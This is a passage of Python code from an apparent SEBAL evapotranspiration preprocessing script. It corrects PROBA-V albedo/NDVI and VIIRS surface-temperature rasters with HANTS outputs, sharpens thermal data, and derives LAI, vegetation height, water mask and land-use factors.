geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers_PROBAV, 'Outliers_PROBAV_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data, name_out, shape, nband=1)
############################################# Create ALBEDO and NDVI #########################################
# Create the end thermal files date by date
for date in Dates:
# Define date
year = date.year
month = date.month
day = date.day
# input filenames needed for creating end thermal file
filename_outliers = os.path.join(output_folder_HANTS_outliers_PROBAV,"Outliers_PROBAV_%d%02d%02d.tif" %(year,month,day))
VAR = 'Albedo'
input_folder_PreSEBAL_ALBEDO = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
filename_Albedo_original = os.path.join(Albedo_outfolder, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
filename_Albedo_HANTS = os.path.join(input_folder_PreSEBAL_ALBEDO, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
VAR = 'NDVI'
input_folder_PreSEBAL_NDVI = os.path.join(temp_folder_PreSEBAL, VAR + "_HANTS")
filename_NDVI_original = os.path.join(NDVI_outfolder, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
filename_NDVI_HANTS = os.path.join(input_folder_PreSEBAL_NDVI, "%s_PROBAV_%d%02d%02d.tif" %(VAR,year,month,day))
# Open the input filenames
dest_outliers = gdal.Open(filename_outliers)
dest_PROBAV_ALBEDO = gdal.Open(filename_Albedo_original)
dest_PROBAV_NDVI = gdal.Open(filename_NDVI_original)
dest_HANTS_ALBEDO = gdal.Open(filename_Albedo_HANTS)
dest_HANTS_NDVI = gdal.Open(filename_NDVI_HANTS)
# If original exists, this will be the basis for the end thermal map
if not dest_PROBAV_ALBEDO == None:
# Open arrays of the input files
Array_outliers = dest_outliers.GetRasterBand(1).ReadAsArray()[:,:]
Array_ALBEDO_original = dest_PROBAV_ALBEDO.GetRasterBand(1).ReadAsArray()
Array_ALBEDO_HANTS = dest_HANTS_ALBEDO.GetRasterBand(1).ReadAsArray()[:,:]
Array_NDVI_original = dest_PROBAV_NDVI.GetRasterBand(1).ReadAsArray()
Array_NDVI_HANTS = dest_HANTS_NDVI.GetRasterBand(1).ReadAsArray()[:,:]
# Create outlier Mask
Array_outliers[Array_outliers==-9999.] = 0
Array_outliers_mask = np.zeros(np.shape(Array_outliers))
Array_outliers_mask[Array_outliers==1.]=0
Array_outliers_mask[Array_outliers==0.]=1
Array_outliers_mask[Array_outliers_mask==0]=2
Array_outliers_mask[Array_outliers_mask==1]=0
Array_outliers_mask[Array_outliers_mask==2]=1
# Create a buffer zone arround the bad pixels
Array_outliers_mask = Create_Buffer(Array_outliers_mask)
Array_outliers_mask[Array_outliers_mask==1] = 2
Array_outliers_mask[Array_outliers_mask==0] = 1
Array_outliers_mask[Array_outliers_mask==2] = 0
# If there are more than 300 Good pixels
if np.nansum(Array_outliers_mask) > 300:
# Use the mask to find the good original pixels and HANTS pixels
Array_ALBEDO_original_mask_nan = Array_ALBEDO_original * Array_outliers_mask
Array_ALBEDO_HANTS_mask_nan = Array_ALBEDO_HANTS * Array_outliers_mask
Array_NDVI_original_mask_nan = Array_NDVI_original * Array_outliers_mask
Array_NDVI_HANTS_mask_nan = Array_NDVI_HANTS * Array_outliers_mask
# Create a 1D array of those pixels
Array_ALBEDO_original_mask_nan_flatten = Array_ALBEDO_original_mask_nan.flatten()
Array_ALBEDO_HANTS_mask_nan_flatten = Array_ALBEDO_HANTS_mask_nan.flatten()
Array_NDVI_original_mask_nan_flatten = Array_NDVI_original_mask_nan.flatten()
Array_NDVI_HANTS_mask_nan_flatten = Array_NDVI_HANTS_mask_nan.flatten()
# Remove pixels with high and low values
Array_ALBEDO_HANTS_mask_nan_flatten[Array_ALBEDO_HANTS_mask_nan_flatten<-0.2] = np.nan
Array_ALBEDO_HANTS_mask_nan_flatten[Array_ALBEDO_HANTS_mask_nan_flatten>0.6] = np.nan
Array_ALBEDO_original_mask_nan_flatten[Array_ALBEDO_original_mask_nan_flatten<-0.2] = np.nan
Array_ALBEDO_original_mask_nan_flatten[Array_ALBEDO_original_mask_nan_flatten>0.6] = np.nan
Array_NDVI_HANTS_mask_nan_flatten[Array_NDVI_HANTS_mask_nan_flatten<-0.2] = np.nan
Array_NDVI_HANTS_mask_nan_flatten[Array_NDVI_HANTS_mask_nan_flatten>0.6] = np.nan
Array_NDVI_original_mask_nan_flatten[Array_NDVI_original_mask_nan_flatten<-0.2] = np.nan
Array_NDVI_original_mask_nan_flatten[Array_NDVI_original_mask_nan_flatten>0.6] = np.nan
# Remove the nan values (if there is a nan in one of the arrays remove also the same value in the other array)
Array_ALBEDO_original_mask_nan_flatten2 = Array_ALBEDO_original_mask_nan_flatten[np.logical_or(~np.isnan(Array_ALBEDO_original_mask_nan_flatten),~np.isnan(Array_ALBEDO_HANTS_mask_nan_flatten))]
Array_ALBEDO_HANTS_mask_nan_flatten2 = Array_ALBEDO_HANTS_mask_nan_flatten[np.logical_or(~np.isnan(Array_ALBEDO_original_mask_nan_flatten),~np.isnan(Array_ALBEDO_HANTS_mask_nan_flatten))]
Array_NDVI_original_mask_nan_flatten2 = Array_NDVI_original_mask_nan_flatten[np.logical_or(~np.isnan(Array_NDVI_original_mask_nan_flatten),~np.isnan(Array_NDVI_HANTS_mask_nan_flatten))]
Array_NDVI_HANTS_mask_nan_flatten2 = Array_NDVI_HANTS_mask_nan_flatten[np.logical_or(~np.isnan(Array_NDVI_HANTS_mask_nan_flatten),~np.isnan(Array_NDVI_original_mask_nan_flatten))]
Array_ALBEDO_original_mask_nan_flatten = Array_ALBEDO_original_mask_nan_flatten2
Array_ALBEDO_HANTS_mask_nan_flatten = Array_ALBEDO_HANTS_mask_nan_flatten2
Array_NDVI_original_mask_nan_flatten = Array_NDVI_original_mask_nan_flatten2
Array_NDVI_HANTS_mask_nan_flatten = Array_NDVI_HANTS_mask_nan_flatten2
# Remove all zero values
Array_ALBEDO_original_mask_nan_flatten_without_zero =Array_ALBEDO_original_mask_nan_flatten[Array_ALBEDO_original_mask_nan_flatten != 0.0]
Array_NDVI_original_mask_nan_flatten_without_zero =Array_NDVI_original_mask_nan_flatten[Array_NDVI_original_mask_nan_flatten != 0.0]
# Caluculate the value of the 40 and 90 percent percentiles of the original arrays good pixels
Array_ALBEDO_original_mask_value_cold = np.nanpercentile(Array_ALBEDO_original_mask_nan_flatten_without_zero,40)
Array_ALBEDO_original_mask_value_hot = np.nanpercentile(Array_ALBEDO_original_mask_nan_flatten_without_zero,90)
Array_NDVI_original_mask_value_cold = np.nanpercentile(Array_NDVI_original_mask_nan_flatten_without_zero,40)
Array_NDVI_original_mask_value_hot = np.nanpercentile(Array_NDVI_original_mask_nan_flatten_without_zero,90)
# Delete the colder and hotter pixel values in both 1D arrays (this is to exclude large areas of seas)
Array_ALBEDO_HANTS_mask_nan_flatten_exc_coldest = Array_ALBEDO_HANTS_mask_nan_flatten[np.logical_and(Array_ALBEDO_original_mask_nan_flatten > Array_ALBEDO_original_mask_value_cold,Array_ALBEDO_original_mask_nan_flatten < Array_ALBEDO_original_mask_value_hot)]
Array_ALBEDO_original_mask_nan_flatten_exc_coldest = Array_ALBEDO_original_mask_nan_flatten[np.logical_and(Array_ALBEDO_original_mask_nan_flatten > Array_ALBEDO_original_mask_value_cold,Array_ALBEDO_original_mask_nan_flatten < Array_ALBEDO_original_mask_value_hot)]
Array_NDVI_HANTS_mask_nan_flatten_exc_coldest = Array_NDVI_HANTS_mask_nan_flatten[np.logical_and(Array_NDVI_original_mask_nan_flatten > Array_NDVI_original_mask_value_cold,Array_NDVI_original_mask_nan_flatten < Array_NDVI_original_mask_value_hot)]
Array_NDVI_original_mask_nan_flatten_exc_coldest = Array_NDVI_original_mask_nan_flatten[np.logical_and(Array_NDVI_original_mask_nan_flatten > Array_NDVI_original_mask_value_cold,Array_NDVI_original_mask_nan_flatten < Array_NDVI_original_mask_value_hot)]
#Calculate the mean of those arrays
Ave_ALBEDO_HANTS = np.nanmean(Array_ALBEDO_HANTS_mask_nan_flatten_exc_coldest)
Ave_ALBEDO_original = np.nanmean(Array_ALBEDO_original_mask_nan_flatten_exc_coldest)
Ave_NDVI_HANTS = np.nanmean(Array_NDVI_HANTS_mask_nan_flatten_exc_coldest)
Ave_NDVI_original = np.nanmean(Array_NDVI_original_mask_nan_flatten_exc_coldest)
# Calculate the correction factor for the simulated image
Factor_Albedo = Ave_ALBEDO_original/Ave_ALBEDO_HANTS
Factor_NDVI = Ave_NDVI_original/Ave_NDVI_HANTS
# Apply this factor over the simulated HANTS image
Array_ALBEDO_HANTS_Corrected = Array_ALBEDO_HANTS * Factor_Albedo
Array_NDVI_HANTS_Corrected = Array_NDVI_HANTS * Factor_NDVI
# Create the end array by replacing the bad pixels of the original array by the corrected simulated HANTS values
End_array_Albedo = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array_Albedo[Array_outliers_mask==0] =Array_ALBEDO_HANTS_Corrected[Array_outliers_mask==0]
End_array_Albedo[Array_outliers_mask==1] =Array_ALBEDO_original[Array_outliers_mask==1]
End_array_NDVI = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array_NDVI[Array_outliers_mask==0] =Array_NDVI_HANTS_Corrected[Array_outliers_mask==0]
End_array_NDVI[Array_outliers_mask==1] =Array_NDVI_original[Array_outliers_mask==1]
# If the original images is to bad than replace the whole image by the simulated HANTS image
else:
End_array_Albedo = Array_ALBEDO_HANTS
End_array_NDVI = Array_NDVI_HANTS
# Get the geolocation information of the image
geo = dest_PROBAV_ALBEDO.GetGeoTransform()
proj = dest_outliers.GetProjection()
# If there is no original image, use the simulated HANTS image
else:
Array_ALBEDO_HANTS = dest_HANTS_ALBEDO.GetRasterBand(1).ReadAsArray()
End_array_Albedo = Array_ALBEDO_HANTS
Array_NDVI_HANTS = dest_HANTS_NDVI.GetRasterBand(1).ReadAsArray()
End_array_NDVI = Array_NDVI_HANTS
dest_test = None
i = 0
while dest_test == None:
# Get the date of the first image that exists to get the geolocation information
date2 = Dates[i]
year2 = date2.year
month2= date2.month
day2 = date2.day
try:
filename_ALBEDO_original2 = os.path.join(input_folder_PreSEBAL_ALBEDO, "Albedo_PROBAV_%d%02d%02d.tif" %(year2,month2,day2))
dest_test = gdal.Open(filename_ALBEDO_original2)
geo = dest_test.GetGeoTransform()
proj = dest_test.GetProjection()
except:
i+=1
# Save the end array
output_name_end_ALBEDO = os.path.join(ALBEDO_outfolder_end, "Albedo_PROBAV_%d%02d%02d.tif"%(year,month,day))
SEBAL.save_GeoTiff_proy(dest, End_array_Albedo, output_name_end_ALBEDO, shape, nband=1)
output_name_end_NDVI = os.path.join(NDVI_outfolder_end, "NDVI_PROBAV_%d%02d%02d.tif"%(year,month,day))
SEBAL.save_GeoTiff_proy(dest, End_array_NDVI, output_name_end_NDVI, shape, nband=1)
############################################# Create Outlier maps for VIIRS #########################################
# Create output folder if not exists
output_folder_HANTS_outliers_VIIRS = os.path.join(temp_folder_PreSEBAL, 'Outliers_VIIRS')
if not os.path.exists(output_folder_HANTS_outliers_VIIRS):
os.mkdir(output_folder_HANTS_outliers_VIIRS)
fh = Dataset(nc_path_TB, mode='r')
Var = fh.variables.keys()[-1]
lat = fh.variables[fh.variables.keys()[1]][:]
lon = fh.variables[fh.variables.keys()[2]][:]
time = fh.variables[fh.variables.keys()[3]][:]
minimum_lon = np.min(lon)
maximum_lat = np.max(lat)
diff_lon = lon[1] - lon[0]
diff_lat = lat[1] - lat[0]
if not ('shape' in locals() or 'dest' in locals()):
Example_file = os.path.join(output_folder_preprocessing_THERM,Back_name_TB)
dest = gdal.Open(Example_file)
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
for i in range(0,int(np.shape(time)[0])):
time_now = time[i]
data = fh.variables['outliers'][:,:,i]
geo = tuple([minimum_lon, diff_lon, 0, maximum_lat, 0, diff_lat])
name_out = os.path.join(output_folder_HANTS_outliers_VIIRS, 'Outliers_VIIRS_%s.tif' %time_now)
SEBAL.save_GeoTiff_proy(dest, data, name_out, shape, nband=1)
############################################# Create end thermal #########################################
# Create the end thermal files date by date
for date in Dates:
# Define date
year = date.year
month = date.month
day = date.day
# input filenames needed for creating end thermal file
filename_outliers = os.path.join(output_folder_HANTS_outliers_VIIRS,"Outliers_VIIRS_%d%02d%02d.tif" %(year,month,day))
filename_VIIRS_original = os.path.join(input_folder_HANTS_THERM, "Surface_Temperature_VIIRS_%d%02d%02d.tif" %(year,month,day))
filename_VIIRS_HANTS = os.path.join(temp_folder_PreSEBAL, THERM + "_HANTS", "Surface_Temperature_VIIRS_%d%02d%02d.tif" %(year,month,day))
# Open the input filenames
dest_outliers = gdal.Open(filename_outliers)
dest_VIIRS_original = gdal.Open(filename_VIIRS_original)
dest_VIIRS_HANTS = gdal.Open(filename_VIIRS_HANTS)
# If original exists, this will be the basis for the end thermal map
if not dest_VIIRS_original == None:
# Open arrays of the input files
Array_outliers = dest_outliers.GetRasterBand(1).ReadAsArray()[:,:]
Array_VIIRS_original = dest_VIIRS_original.GetRasterBand(1).ReadAsArray()
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()[:,:]
# Create outlier Mask
Array_outliers[Array_outliers==-9999.] = 0
Array_outliers_mask = np.zeros(np.shape(Array_outliers))
Array_outliers_mask[Array_outliers==1.]=0
Array_outliers_mask[Array_outliers==0.]=1
Array_outliers_mask[Array_outliers_mask==0]=2
Array_outliers_mask[Array_outliers_mask==1]=0
Array_outliers_mask[Array_outliers_mask==2]=1
# Create a buffer zone arround the bad pixels
Array_outliers_mask = Create_Buffer(Array_outliers_mask)
Array_outliers_mask[Array_outliers_mask==1] = 2
Array_outliers_mask[Array_outliers_mask==0] = 1
Array_outliers_mask[Array_outliers_mask==2] = 0
# If there are more than 300 Good pixels
if np.nansum(Array_outliers_mask) > 300:
# Use the mask to find the good original pixels and HANTS pixels
Array_VIIRS_original_mask_nan = Array_VIIRS_original * Array_outliers_mask
Array_VIIRS_HANTS_mask_nan = Array_VIIRS_HANTS * Array_outliers_mask
# Create a 1D array of those pixels
Array_VIIRS_original_mask_nan_flatten = Array_VIIRS_original_mask_nan.flatten()
Array_VIIRS_HANTS_mask_nan_flatten = Array_VIIRS_HANTS_mask_nan.flatten()
# Remove pixels with high and low values
Array_VIIRS_HANTS_mask_nan_flatten[Array_VIIRS_HANTS_mask_nan_flatten<250] = np.nan
Array_VIIRS_HANTS_mask_nan_flatten[Array_VIIRS_HANTS_mask_nan_flatten>350] = np.nan
Array_VIIRS_original_mask_nan_flatten[Array_VIIRS_original_mask_nan_flatten<250] = np.nan
Array_VIIRS_original_mask_nan_flatten[Array_VIIRS_original_mask_nan_flatten>350] = np.nan
# Remove the nan values (if there is a nan in one of the arrays remove also the same value in the other array)
Array_VIIRS_original_mask_no_nan_flatten = Array_VIIRS_original_mask_nan_flatten[np.logical_or(~np.isnan(Array_VIIRS_original_mask_nan_flatten),~np.isnan(Array_VIIRS_HANTS_mask_nan_flatten))]
Array_VIIRS_HANTS_mask_no_nan_flatten = Array_VIIRS_HANTS_mask_nan_flatten[np.logical_or(~np.isnan(Array_VIIRS_original_mask_nan_flatten),~np.isnan(Array_VIIRS_HANTS_mask_nan_flatten))]
# Remove all zero values
Array_VIIRS_original_mask_nan_flatten_without_zero =Array_VIIRS_original_mask_no_nan_flatten[Array_VIIRS_original_mask_no_nan_flatten>0]
# Caluculate the value of the 40 and 90 percent percentiles of the original arrays good pixels
Array_VIIRS_original_mask_value_cold = np.nanpercentile(Array_VIIRS_original_mask_nan_flatten_without_zero,40)
Array_VIIRS_original_mask_value_hot = np.nanpercentile(Array_VIIRS_original_mask_nan_flatten_without_zero,90)
# Delete the colder and hotter pixel values in both 1D arrays (this is to exclude large areas of seas)
Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest = Array_VIIRS_HANTS_mask_no_nan_flatten[np.logical_and(Array_VIIRS_original_mask_no_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_no_nan_flatten < Array_VIIRS_original_mask_value_hot)]
Array_VIIRS_original_mask_nan_flatten_exc_coldest = Array_VIIRS_original_mask_no_nan_flatten[np.logical_and(Array_VIIRS_original_mask_no_nan_flatten > Array_VIIRS_original_mask_value_cold,Array_VIIRS_original_mask_no_nan_flatten < Array_VIIRS_original_mask_value_hot)]
#Calculate the mean of those arrays
Ave_VIIRS_HANTS = np.nanmean(Array_VIIRS_HANTS_mask_nan_flatten_exc_coldest)
Ave_VIIRS_original = np.nanmean(Array_VIIRS_original_mask_nan_flatten_exc_coldest)
# Calculate the correction factor for the simulated image
Factor = Ave_VIIRS_original/Ave_VIIRS_HANTS
# Apply this factor over the simulated HANTS image
Array_VIIRS_HANTS_Corrected = Array_VIIRS_HANTS * Factor
# Create the end array by replacing the bad pixels of the original array by the corrected simulated HANTS values
End_array = np.ones(np.shape(Array_outliers_mask)) * np.nan
End_array[Array_outliers_mask==0] =Array_VIIRS_HANTS_Corrected[Array_outliers_mask==0]
End_array[Array_outliers_mask==1] =Array_VIIRS_original[Array_outliers_mask==1]
# If the original images is to bad than replace the whole image by the simulated HANTS image
else:
End_array = Array_VIIRS_HANTS
# Get the geolocation information of the image
geo = dest_VIIRS_original.GetGeoTransform()
proj = dest_outliers.GetProjection()
# If there is no original image, use the simulated HANTS image
else:
Array_VIIRS_HANTS = dest_VIIRS_HANTS.GetRasterBand(1).ReadAsArray()
End_array = Array_VIIRS_HANTS
dest_test = None
i = 0
while dest_test == None:
# Get the date of the first image that exists to get the geolocation information
date2 = Dates[i]
year2 = date2.year
month2= date2.month
day2 = date2.day
try:
filename_VIIRS_original2 = os.path.join(input_folder_HANTS_THERM, "Surface_Temperature_VIIRS_%d%02d%02d.tif" %(year2,month2,day2))
dest_test = gdal.Open(filename_VIIRS_original2)
geo = dest_test.GetGeoTransform()
proj = dest_test.GetProjection()
except:
i+=1
# Save the end array
output_name_end_LST = os.path.join(temp_folder_PreSEBAL_LST, "VIIRS_LST_%d%02d%02d.tif"%(year,month,day))
SEBAL.save_GeoTiff_proy(dest, End_array, output_name_end_LST, shape, nband=1)
###################################################################################################################
###################################################### preSEBAL continue ##########################################
###################################################################################################################
############################################### Apply thermal sharpening ##########################################
print('---------------------------------------------------------')
print('-------------------- Downscale VIIRS --------------------')
print('---------------------------------------------------------')
# Upscale VIIRS and PROBA-V to 400m
pixel_spacing_upscale = 400
# Open the General_Input sheet
ws = wb['General_Input']
# Extract the input and output folder, and Image type from the excel file
DEM_fileName = str(ws['E2'].value)
ws = wb['VIIRS_PROBAV_Input']
UTM_Zone = int(str(ws['G2'].value))
# Reproject from Geog Coord Syst to UTM -
# 1) DEM - Original DEM coordinates is Geographic: lat, lon
proyDEM_fileName_100 = os.path.join(temp_folder_PreSEBAL,'DEM_100.tif')
dest, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset(
DEM_fileName, pixel_spacing = 100, UTM_Zone=UTM_Zone)
band = dest.GetRasterBand(1) # Get the reprojected dem band
ncol = dest.RasterXSize # Get the reprojected dem column size
nrow = dest.RasterYSize # Get the reprojected dem row size
shape=[ncol, nrow]
DEM = band.ReadAsArray()
# Save DEM file with the 100 meter resolution
SEBAL.save_GeoTiff_proy(dest, DEM, proyDEM_fileName_100, shape, nband=1)
# Create upscaled DEM
proyDEM_fileName_400 = os.path.join(temp_folder_PreSEBAL,'DEM_400.tif')
dest_400, ulx_dem_400, lry_dem_400, lrx_dem_400, uly_dem_400, epsg_to = SEBAL.reproject_dataset(
DEM_fileName, pixel_spacing_upscale, UTM_Zone = UTM_Zone)
# find spatial parameters array
DEM_400 = dest_400.GetRasterBand(1).ReadAsArray()
Y_raster_size_400 = dest_400.RasterYSize
X_raster_size_400 = dest_400.RasterXSize
shape_400=([X_raster_size_400, Y_raster_size_400])
# Save DEM file with the 400 meter resolution
SEBAL.save_GeoTiff_proy(dest_400, DEM_400, proyDEM_fileName_400, shape_400, nband=1)
for date in Dates:
surf_temp_fileName = os.path.join(temp_folder_PreSEBAL, 'Surf_temp_After_TS_%d%02d%02d.tif' %(date.year, date.month, date.day))
temp_surface_100_fileName_beforeTS = os.path.join(temp_folder_PreSEBAL_LST,'VIIRS_LST_%d%02d%02d.tif' %(date.year, date.month, date.day))
################################ Thermal Sharpening #####################################################
# Define filename
file_NDVI_after_HANTS = os.path.join(NDVI_outfolder_end, 'NDVI_PROBAV_%d%02d%02d.tif' %(date.year, date.month, date.day))
# Open NDVI/LST destination folder
dest_NDVI = gdal.Open(file_NDVI_after_HANTS)
dest_LST = gdal.Open(temp_surface_100_fileName_beforeTS)
# Open NDVI array
NDVI = dest_NDVI.GetRasterBand(1).ReadAsArray()
# Open LST array
LST = dest_LST.GetRasterBand(1).ReadAsArray()
# Upscale thermal band VIIRS from 100m to 400m
VIIRS_Upscale, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset_example(
temp_surface_100_fileName_beforeTS, proyDEM_fileName_400)
data_Temp_Surf_400 = VIIRS_Upscale.GetRasterBand(1).ReadAsArray()
# Upscale PROBA-V NDVI from 100m to 400m
NDVI_PROBAV_Upscale, ulx_dem, lry_dem, lrx_dem, uly_dem, epsg_to = SEBAL.reproject_dataset_example(
file_NDVI_after_HANTS, proyDEM_fileName_400)
data_NDVI_400 = NDVI_PROBAV_Upscale.GetRasterBand(1).ReadAsArray()
# Define the width of the moving window box
Box=9
# Apply the surface temperature sharpening
temp_surface_sharpened = SEBAL.Thermal_Sharpening(data_Temp_Surf_400, data_NDVI_400, NDVI, Box, NDVI_PROBAV_Upscale, output_folder, proyDEM_fileName_100, shape, dest, surf_temp_fileName)
# Create Water mask based on HANTS NDVI output
water_mask = np.zeros((shape[1], shape[0]))
water_mask[NDVI<0.0]=1
# Divide temporal watermask in snow and water mask by using surface temperature
Snow_Mask_PROBAV, water_mask, ts_moist_veg_min, NDVI_max, NDVI_std = SEBAL.CalculateSnowWaterMask(NDVI,shape,water_mask,temp_surface_sharpened)
# Replace water values
temp_surface_sharpened[water_mask==1] = LST[water_mask == 1]
temp_surface_sharpened = np.where(np.isnan(temp_surface_sharpened), LST, temp_surface_sharpened)
surf_temp_fileName = os.path.join(output_folder_HANTS_end_sharp, 'LST_surface_temp_sharpened_%d%02d%02d.tif' %(date.year, date.month, date.day))
SEBAL.save_GeoTiff_proy(dest, temp_surface_sharpened, surf_temp_fileName, shape, nband=1)
################################################## Calculate LAI ##################################################
# Open NDVI destination folder
dest_NDVI = gdal.Open(file_NDVI_after_HANTS)
# Open NDVI array
NDVI = dest_NDVI.GetRasterBand(1).ReadAsArray()
LAI_FileName = os.path.join(LAI_outfolder,'LAI_%d%02d%02d.tif' %(date.year, date.month, date.day))
# Calculate LAI
FPAR, tir_emis, Nitrogen, vegt_cover, LAI, b10_emissivity = SEBAL.Calc_vegt_para(NDVI,water_mask, shape)
SEBAL.save_GeoTiff_proy(dest, LAI, LAI_FileName, shape, nband=1)
################################ Calculate the Vegetation height ########################
# Open preprosessing excel the Vegetation_Height sheet
ws_veg = wb_veg['Vegetation_Height']
# Define output name for the LandUse map
dst_FileName = os.path.join(output_folder,'LU.tif')
# Open LU data
LU_dest = gdal.Open(LU_data_FileName)
LU_data = LU_dest.GetRasterBand(1).ReadAsArray()
# Reproject the LAI to the same projection as LU
dest1, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(LAI_FileName, LU_data_FileName) ## input after HANTS
LAI_proj = dest1.GetRasterBand(1).ReadAsArray()
# Read out the excel file coefficient numbers
Array = np.zeros([ws_veg.max_row-1,4])
for j in ['A','C','D','E']:
j_number={'A' : 0, 'C' : 1, 'D' : 2, 'E' : 3}
for i in range(2,ws_veg.max_row+1):
Value = (ws_veg['%s%s' %(j,i)].value)
Array[i-2, j_number[j]] = Value
# Create maps with the coefficient numbers for the right land cover
coeff = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1]),3])
for coeff_nmbr in range(0,3):
for Class in range(0,len(Array)):
coeff[LU_data==Array[Class,0],coeff_nmbr] = Array[Class,coeff_nmbr+1]
# Get some dimensions of the projected dataset
band_data = dest1.GetRasterBand(1)
ncol_data = dest1.RasterXSize
nrow_data = dest1.RasterYSize
shape_data=[ncol_data, nrow_data]
# Calculate the vegetation height in the LU projection
Veg_Height_proj = coeff[:,:,0] * np.power(LAI_proj,2) + coeff[:,:,1] * LAI_proj + coeff[:,:,2]
Veg_Height_proj = np.clip(Veg_Height_proj, 0, 600)
# Save the vegetation height in the lU projection in the temporary directory
Veg_Height_proj_FileName = os.path.join(temp_folder_PreSEBAL,'Veg_Height_proj.tif')
SEBAL.save_GeoTiff_proy(dest1, Veg_Height_proj, Veg_Height_proj_FileName, shape_data, nband=1)
# Reproject the Veg_height to the LAI projection
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(Veg_Height_proj_FileName, LAI_FileName)
# Get some dimensions of the original dataset
band_data = dest.GetRasterBand(1)
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
# Open the Veg_height with the same projection as LAI
Veg_Height = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
Veg_Height[Veg_Height == 0] = 0.4
# Save Vegetation Height in the end folder
dst_FileName = os.path.join(output_folder_HANTS_end_Veg,'Vegetation_Height_%d%02d%02d.tif' %(date.year, date.month, date.day))
SEBAL.save_GeoTiff_proy(dest, Veg_Height, dst_FileName, shape, nband=1)
######################## calculate Water Mask #########################
# Open all the water mask
os.chdir(WaterMask_outfolder)
re_water_mask = glob.glob('Water_Mask*.tif')
# Loop over all the files
for water_mask_filename in re_water_mask:
# Create the filepath to the water mask
water_mask_filepath = os.path.join(WaterMask_outfolder,water_mask_filename)
# Open Array
water_mask_dest = gdal.Open(water_mask_filepath)
# If the total water mask raster does not exists create this one
if not 'water_mask_array' in locals():
water_mask_array = np.zeros([water_mask_dest.RasterYSize, water_mask_dest.RasterXSize])
# Add all the water masks
water_mask_array += water_mask_dest.GetRasterBand(1).ReadAsArray()
# Calculate the end water mask if the area is more than 50 percent defined as water
water_mask_array_per = water_mask_array/len(re_water_mask)
water_mask_array_end = np.zeros([water_mask_dest.RasterYSize, water_mask_dest.RasterXSize])
water_mask_array_end[water_mask_array_per > 0.5] = 1
# Save water mask
WaterMask_outfolder_end_FileName = os.path.join(WaterMask_outfolder_end,'Water_Mask.tif')
SEBAL.save_GeoTiff_proy(dest, water_mask_array_end, WaterMask_outfolder_end_FileName, shape, nband=1)
######################## calculate p-factor by using the Landuse map #########################
ws_p = wb_veg['p-factor']
Array_P = np.zeros([ws_p.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_p.max_row+1):
Value = (ws_p['%s%s' %(j,i)].value)
Array_P[i-2, j_number[j]] = Value
p_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_P)):
p_factor[LU_data==Array_P[Class,0]] = Array_P[Class,1]
p_factor[p_factor == 0] = 0.5
dst_FileName = os.path.join(temp_folder_PreSEBAL, 'p-factor_proj.tif')
SEBAL.save_GeoTiff_proy(dest1, p_factor, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
p_factor = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
p_factor[p_factor == 0] = 0.5
dst_pfactor_FileName = os.path.join(output_folder_p_factor,'p_factor.tif')
SEBAL.save_GeoTiff_proy(dest, p_factor, dst_pfactor_FileName, shape, nband=1)
######################## calculate c-factor by using the Landuse map #########################
ws_c = wb_veg['C-factor']
Array_C = np.zeros([ws_c.max_row-1,2])
for j in ['A','C']:
j_number={'A' : 0, 'C' : 1}
for i in range(2,ws_c.max_row+1):
Value = (ws_c['%s%s' %(j,i)].value)
Array_C[i-2, j_number[j]] = Value
c_factor = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
for Class in range(0,len(Array_C)):
c_factor[LU_data==Array_C[Class,0]] = Array_C[Class,1]
c_factor[np.logical_and(c_factor != 3.0, c_factor != 4.0)] = np.nan
LUE_max = np.zeros([int(np.shape(LU_data)[0]),int(np.shape(LU_data)[1])])
LUE_max[c_factor == 3] = 2.5
LUE_max[c_factor == 4] = 4.5
LUE_max[LUE_max == 0] = 2.5
dst_FileName = os.path.join(temp_folder_PreSEBAL, 'LUE_max_proj.tif')
SEBAL.save_GeoTiff_proy(dest1, LUE_max, dst_FileName, shape_data, nband=1)
dest, ulx, lry, lrx, uly, epsg_to = SEBAL.reproject_dataset_example(dst_FileName, LAI_FileName)
band_data = dest.GetRasterBand(1) # Get the reprojected dem band
ncol_data = dest.RasterXSize
nrow_data = dest.RasterYSize
LUE_max = band_data.ReadAsArray(0, 0, ncol_data, nrow_data)
LUE_max[LUE_max == 0] = 2.5
dst_LUEmax_FileName = os.path.join(output_folder_LUE,'LUE_max.tif')
SEBAL.save_GeoTiff_proy(dest, LUE_max, dst_LUEmax_FileName, shape, nband=1)
####################################################################################################################
################################################ Write output part 6 ###############################################
####################################################################################################################
############################################# Fill in the additional input sheet #########################################
# things to be filled in:
# Transmissivity (optional)
# NDVI (additional input)
# Albedo (additional input)
# LST (additional input)
# Water Mask (additional input)
# p-factor (soil input)
# c-factor (soil input)
# Vegetation height (meteo input)
# VIIRS parameter copy
VIIRS_Dict = {}
